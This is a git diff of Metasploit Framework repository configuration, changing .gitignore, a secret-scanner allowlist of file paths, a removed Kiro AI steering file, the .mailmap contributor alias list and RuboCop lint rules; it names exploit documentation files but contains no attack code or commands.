@@ -3,8 +3,6 @@ Gemfile.local
 Gemfile.local.lock
 # Rubymine project directory
 .idea
-# Visual Studio Code configuration settings directory
-.vscode
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
@@ -19,14 +17,10 @@ Gemfile.local.lock
 .yardoc
 # Mac OS X files
 .DS_Store
-# Ignore Solargraph config file
-.solargraph.yml
 # database config for testing
 config/database.yml
 # target config file for testing
 features/support/targets.yml
-# Generated test files
-spec/dummy
 # simplecov coverage data
 coverage
 doc/
@@ -99,9 +93,3 @@ docker-compose.local*
 # Ignore python bytecode
 *.pyc
 rspec.failures
-
-#Ignore any base disk store files
-db/modules_metadata_base.pstore
-
-# gradle build files
-**/.gradle
@@ -1,46 +0,0 @@
-06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:73
-06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:76
-06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:119
-deabf9b1d846e4ced5dca20be5e21e8732762889:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2023_22527.md:16
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector:1
-b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector:1
-58f9a39f72c623ab337a6768b34dc32f06d8ae67:documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md:60
-686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
-686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
-619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
-619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
-619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
-619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:65
-e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
-e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
-e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
-e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:93
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:7642
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8471
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8472
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
-94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/python_flask_cookie_signer.md:99
@@ -1,12 +0,0 @@
---
-inclusion: always
---
-
-# Metasploit Framework — Kiro Steering
-
-Follow the project's AI agent instructions and coding conventions defined in the repository root.
-
-## References
- AI agent instructions: #[[file:AGENTS.md]]
- Contributing guide: #[[file:CONTRIBUTING.md]]
- RuboCop config: #[[file:.rubocop.yml]]
@@ -1,23 +1,58 @@
-adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
-adeherdt-r7 <adeherdt-r7@github>       Arne De Herdt <arne_deherdt@rapid7.com>
-bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
-cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
-cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
-dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
-dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
-gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
-jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
-mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
-smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
-space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
-todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>               <todb@metasploit.com>
-todb-r7 <todb-r7@github>               <todb@packetfu.com>
-dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>
-msutovsky-r7 <msutovsky-r7@github>     <martin_sutovsky@rapid7.com>
+acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
+asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
+bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
+bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
+bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
+bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
+egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
+egypt <egypt@github>                 <james_lee@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
+jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
+jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>       <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
+kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
+khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
+lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
+pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
+tatanus <tatanus@github>             <adam_compton@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>             <todb@metasploit.com>
+todb-r7 <todb-r7@github>             <todb@packetfu.com>
+wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
+wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
+wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
+wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -26,23 +61,14 @@ msutovsky-r7 <msutovsky-r7@github>     <martin_sutovsky@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

-acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
-adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
-asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
-bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
+bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
@@ -56,15 +82,8 @@ corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
 corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
-DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
-dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                   <james_lee@rapid7.com>
 espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
 farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
@@ -83,8 +102,6 @@ hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
 jabra <jabra@github>                   <jabra@spl0it.org>
-jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -92,9 +109,6 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
-jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
-jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>         <jqian@rapid7.com>
 joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
@@ -104,17 +118,9 @@ juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@kernelsmith.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@metasploit.com>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
-kgray-r7 <kgray-r7@github>             <kyle_gray@rapid7.com>
 kost <kost@github>                     Vlatko Kosturjak <kost@linux.hr>
 kris <kris@???>                        kris <>
 KronicDeth <KronicDeth@github>         Luke Imhoff <luke_imhoff@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
-lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -122,7 +128,6 @@ m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
 Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
 Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
-mwalas-r7 <mwalas-r7@github>           <marcin_walas@rapid7.com>
 net-ninja <net-ninja@github.com>       Steven Seeley <steventhomasseeley@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
@@ -130,7 +135,6 @@ nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
 nullbind <nullbind@github>             Scott Sutherland <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
 oj <oj@github>                         <oj@buffered.io>
-pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
@@ -146,22 +150,12 @@ rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
-sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
-sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
-smashery <smashery@github>             Ashley Donaldson <smashery@gmail.com>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
-tatanus <tatanus@github>               <adam_compton@rapid7.com>
-tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -174,10 +168,6 @@ void-in <void-in@github>               void-in <root@localhost.localdomain>
 void-in <void-in@github>               <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
-wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
-wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
-wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

 # Aliases for utility author names. Since they're fake, typos abound
@@ -4,227 +4,18 @@
 # new modules.
 #
 # Updates to this file should include a 'Description' parameter for any
-# explanation needed.
+# explaination needed.

 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.7
-  SuggestExtensions: false
-  NewCops: disable
-
-require:
-  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
-  - ./lib/rubocop/cop/layout/module_hash_values_on_same_line.rb
-  - ./lib/rubocop/cop/layout/module_description_indentation.rb
-  - ./lib/rubocop/cop/layout/extra_spacing_with_bindata_ignored.rb
-  - ./lib/rubocop/cop/lint/module_disclosure_date_format.rb
-  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
-  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
-  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
-  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
-  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
-  - ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
-  - ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
-  - ./lib/rubocop/cop/lint/bare_check_code_in_non_exploit.rb
-
-Layout/SpaceBeforeBrackets:
-  Enabled: true
-
-Lint/AmbiguousAssignment:
-  Enabled: true
-
-Lint/DeprecatedConstants:
-  Enabled: true
-
-Lint/DuplicateBranch:
-  Description: >-
-    Disabled as it causes a lot of noise around our current exception/error handling
-  Enabled: false
-
-Lint/DuplicateRegexpCharacterClassElement:
-  Enabled: false
-
-Lint/EmptyBlock:
-  Enabled: false
-
-Lint/EmptyClass:
-  Enabled: false
-
-Lint/LambdaWithoutLiteralBlock:
-  Enabled: true
-
-Lint/NoReturnInBeginEndBlocks:
-  Enabled: true
-
-Lint/NumberedParameterAssignment:
-  Enabled: true
-
-Lint/OrAssignmentToConstant:
-  Enabled: true
-
-Lint/RedundantDirGlobSort:
-  Enabled: true
-
-Lint/SymbolConversion:
-  Enabled: true
-
-Lint/ToEnumArguments:
-  Enabled: true
-
-Lint/TripleQuotes:
-  Enabled: true
-
-Lint/UnexpectedBlockArity:
-  Enabled: true
-
-Lint/UnmodifiedReduceAccumulator:
-  Enabled: true
-
-Lint/UnusedMethodArgument:
-  Description: >-
-    Disabled on files under the lib/ directory (aka library files)
-    as this can break YARD documentation since YARD doesn't recognize
-    the _ prefix before parameter names and thinks its a different argument.
-    See https://github.com/rapid7/metasploit-framework/pull/17735
-    Also see https://github.com/rubocop/rubocop/pull/11020
-  Enabled: true
-  Exclude:
-    - 'lib/**/*'
-
-Style/ArgumentsForwarding:
-  Enabled: true
-
-Style/BlockComments:
-  Description: >-
-    Disabled as multiline comments are great for embedded code snippets/payloads that can
-    be copy/pasted directly into a terminal etc.
-  Enabled: false
-
-Style/CaseLikeIf:
-  Description: >-
-    This would cause a lot of noise, and potentially introduce subtly different code when
-    being auto fixed. Could potentially be enabled in isolation, but would require more
-    consideration.
-  Enabled: false
-
-Style/CollectionCompact:
-  Enabled: true
-
-Style/DocumentDynamicEvalDefinition:
-  Enabled: false
-
-Style/EndlessMethod:
-  Enabled: true
-
-Style/FormatStringToken:
-  Enabled: true
-  Exclude:
-  # We aren't ready to enable this for modules yet
-    - 'modules/**/*'
-
-Style/HashExcept:
-  Enabled: true
-
-Style/IfWithBooleanLiteralBranches:
-  Description: >-
-    Most of the time this is a valid replacement. Although it can generate subtly different
-    rewrites that might break code:
-      2.7.2 :001 > foo = nil
-      => nil
-      2.7.2 :002 > (foo && foo['key'] == 'foo') ? true : false
-      => false
-      2.7.2 :003 > foo && foo['key'] == 'foo'
-      => nil
-  Enabled: false
-
-Style/NegatedIfElseCondition:
-  Enabled: false
-
-Style/MultipleComparison:
-  Description: >-
-    Disabled as it generates invalid code:
-      https://github.com/rubocop-hq/rubocop/issues/9520
-    It may also introduce subtle semantic issues if automatically applied to the
-    entire codebase without rigorous testing.
-  Enabled: false
-
-Style/NilLambda:
-  Enabled: true
-
-Style/RedundantArgument:
-  Enabled: false
-
-Style/RedundantAssignment:
-  Description: >-
-    Disabled as it sometimes improves the readability of code having an explicitly named
-    response object, it also makes it easier to put a breakpoint between the assignment
-    and return expression
-  Enabled: false
-
-Style/RedundantParentheses:
-  Description: >-
-    Disabled as it sometimes improves the readability of code
-  Enabled: false
-
-Style/RedundantRegexpArgument:
-  Enabled: true
-  Exclude:
-  # We aren't ready to enable this for modules yet
-    - 'modules/**/*'
-
-Style/SwapValues:
-  Enabled: false
-
-Layout/LineContinuationLeadingSpace:
-  Description: >-
-    Disabled as it sometimes improves the readability of code having leading spaces
-    for indented code strings.
-  Enabled: false
-
-Layout/ModuleHashOnNewLine:
-  Enabled: true
-
-Layout/ModuleHashValuesOnSameLine:
-  Enabled: true
-
-Layout/ModuleDescriptionIndentation:
-  Enabled: true
-
-Lint/DetectInvalidPackDirectives:
-  Enabled: true
-
-Lint/ModuleDisclosureDateFormat:
-  Enabled: true
-
-Lint/ModuleDisclosureDatePresent:
-  Include:
-    # Only exploits require disclosure dates, but they can be present in auxiliary modules etc.
-    - 'modules/exploits/**/*'
-
-Lint/ModuleEnforceNotes:
-  Include:
-    # Only exploits and auxiliary modules require SideEffects to be listed.
-    - 'modules/exploits/**/*'
-    - 'modules/auxiliary/**/*'
-    - 'modules/post/**/*'
-
-Lint/DeprecatedGemVersion:
-  Enabled: true
-  Exclude:
-    - 'metasploit-framework.gemspec'
-
-Metrics/ModuleLength:
-  Description: 'Most Metasploit modules are quite large. This is ok.'
-  Enabled: false
+  TargetRubyVersion: 2.2

 Metrics/ClassLength:
-  Description: 'Most Metasploit classes are quite large. This is ok.'
-  Enabled: false
-
-Style/ClassAndModuleChildren:
-  Enabled: false
-  Description: 'Forced nesting is harmful for grepping and general code comprehension'
+  Description: 'Most Metasploit modules are quite large. This is ok.'
+  Enabled: true
+  Exclude:
+    - 'modules/**/*'

 Metrics/AbcSize:
  Enabled: false
@@ -238,116 +29,28 @@ Metrics/PerceivedComplexity:
  Enabled: false
  Description: 'This is often a red-herring'

-Metrics/BlockNesting:
-  Description: >-
-    This is a good rule to follow, but will cause a lot of overhead introducing this rule.
-  Enabled: false
-
-Metrics/ParameterLists:
-  Description: >-
-    This is a good rule to follow, but will cause a lot of overhead introducing this rule.
-    Increasing the max count for now
-  Max: 8
-
-Style/TernaryParentheses:
-  Enabled: false
-  Description: 'This outright produces bugs'
-
 Style/FrozenStringLiteralComment:
  Enabled: false
  Description: 'We cannot support this yet without a lot of things breaking'

-Style/MutableConstant:
-  Enabled: false
-  Description: 'We cannot support this yet without a lot of things breaking'
-
 Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

-Naming/HeredocDelimiterNaming:
-  Description: >-
-    Could be enabled in isolation with additional effort.
-  Enabled: false
-
-Naming/AccessorMethodName:
-  Description: >-
-    Disabled for now, as this naming convention is used in a lot of core library files.
-    Could be enabled in isolation with additional effort.
-  Enabled: false
-
-Naming/ConstantName:
-  Description: >-
-    Disabled for now, Metasploit is unfortunately too inconsistent with its naming to introduce
-    this. Definitely possible to enforce this in the future if need be.
-
-    Examples:
-        ManualRanking, LowRanking, etc.
-        NERR_ClientNameNotFound
-        HttpFingerprint
-        CachedSize
-        ErrUnknownTransferId
-  Enabled: false
-
-Naming/VariableNumber:
-  Description: 'To make it easier to use reference code, disable this cop'
-  Enabled: false
-
-Style/NumericPredicate:
-  Description: 'This adds no efficiency nor space saving'
-  Enabled: false
-
-Style/EvenOdd:
-  Description: 'This adds no efficiency nor space saving'
-  Enabled: false
